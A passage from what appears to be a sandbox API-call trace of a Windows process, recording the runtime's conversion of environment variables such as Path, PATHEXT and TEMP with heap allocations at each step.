(Heap=0x2c0000, Flags=0x0, Ptr=0x2e1898, Size=0x1c) returned 0x2e1918 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0153.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2db1a8 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x2db1a8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0153.431] GetLastError () returned 0x0 [0153.431] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1918) returned 0x1c [0153.431] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1918, Size=0x20) returned 0x2e1918 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x14) returned 0x2e1898 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x2e1898, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0153.431] GetLastError () returned 0x0 [0153.431] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1918) returned 0x20 [0153.431] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1918, Size=0x24) returned 0x2e1918 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd) returned 0x2def08 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x2def08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0153.432] GetLastError () returned 0x0 [0153.432] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1918) returned 0x24 [0153.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1918, Size=0x28) returned 0x2e1918 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0153.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x25) returned 0x2db1d8 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x2db1d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0153.432] GetLastError () returned 0x0 [0153.432] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1918) returned 0x28 [0153.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1918, Size=0x2c) returned 0x2e1918 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0153.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x39) returned 0x2d5f68 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x2d5f68, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0153.432] GetLastError () returned 0x0 [0153.432] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1918) returned 0x2c [0153.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1918, Size=0x30) returned 0x2e1918 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0153.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e1950 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2e1950, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0153.432] GetLastError () returned 0x0 [0153.432] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1918) returned 0x30 [0153.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1918, Size=0x34) returned 0x2e1970 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0153.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e1918 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x2e1918, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0153.432] GetLastError () returned 0x0 [0153.432] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1970) returned 0x34 [0153.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1970, Size=0x38) returned 0x2e1970 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0153.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe) returned 0x2def20 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x2def20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0153.432] GetLastError () returned 0x0 [0153.432] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1970) returned 0x38 [0153.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1970, Size=0x3c) returned 0x2e1970 [0153.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0153.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x69) returned 0x2e19b8 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x2e19b8, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0153.433] GetLastError () returned 0x0 [0153.433] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1970) returned 0x3c [0153.433] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1970, Size=0x40) returned 0x2e1970 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0153.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3e) returned 0x2d5fb0 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x2d5fb0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0153.433] GetLastError () returned 0x0 [0153.433] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1970) returned 0x40 [0153.433] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1970, Size=0x44) returned 0x2e1a30 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0153.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1b) returned 0x2df958 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x2df958, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0153.433] GetLastError () returned 0x0 [0153.433] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x44 [0153.433] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x48) returned 0x2e1a30 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0153.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1d) returned 0x2df980 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x2df980, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0153.433] GetLastError () returned 0x0 [0153.433] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x48 [0153.433] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x4c) returned 0x2e1a30 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0153.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d7348 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x2d7348, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0153.433] GetLastError () returned 0x0 [0153.433] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x4c [0153.433] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x50) returned 0x2e1a30 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0153.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12) returned 0x2e1970 [0153.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x2e1970, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0153.433] GetLastError () returned 0x0 [0153.434] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x50 [0153.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x54) returned 0x2e1a30 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0153.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e1990 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x2e1990, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0153.434] GetLastError () returned 0x0 [0153.434] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x54 [0153.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x58) returned 0x2e1a30 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0153.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1b) returned 0x2df9a8 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2df9a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0153.434] GetLastError () returned 0x0 [0153.434] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x58 [0153.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x5c) returned 0x2e1a30 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0153.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2db208 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2db208, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0153.434] GetLastError () returned 0x0 [0153.434] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x5c [0153.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x60) returned 0x2e1a30 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0153.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x29) returned 0x2db8b0 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2db8b0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0153.434] GetLastError () returned 0x0 [0153.434] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x60 [0153.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x64) returned 0x2e1a30 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0153.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2df9d0 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x2df9d0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0153.434] GetLastError () returned 0x0 [0153.434] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x64 [0153.434] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x68) returned 0x2e1a30 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0153.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x41) returned 0x2d7398 [0153.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x2d7398, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0153.435] GetLastError () returned 0x0 [0153.435] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x68 [0153.435] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x6c) returned 0x2e1a30 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0153.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e1aa8 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x2e1aa8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0153.435] GetLastError () returned 0x0 [0153.435] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x6c [0153.435] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x70) returned 0x2e1a30 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0153.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x14) returned 0x2e1ac8 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SESSIONNAME=Console", cchWideChar=-1, lpMultiByteStr=0x2e1ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SESSIONNAME=Console", lpUsedDefaultChar=0x0) returned 20 [0153.435] GetLastError () returned 0x0 [0153.435] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1a30) returned 0x70 [0153.435] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1a30, Size=0x74) returned 0x2e1ae8 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0153.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf) returned 0x2def38 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x2def38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0153.435] GetLastError () returned 0x0 [0153.435] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x74 [0153.435] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x78) returned 0x2e1ae8 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0153.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x16) returned 0x2e1a30 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2e1a30, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0153.435] GetLastError () returned 0x0 [0153.435] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x78 [0153.435] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x7c) returned 0x2e1ae8 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0153.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db8e8 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2db8e8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0153.435] GetLastError () returned 0x0 [0153.435] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x7c [0153.435] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x80) returned 0x2e1ae8 [0153.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0153.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x29) returned 0x2db920 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2db920, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0153.436] GetLastError () returned 0x0 [0153.436] RtlSizeHeap 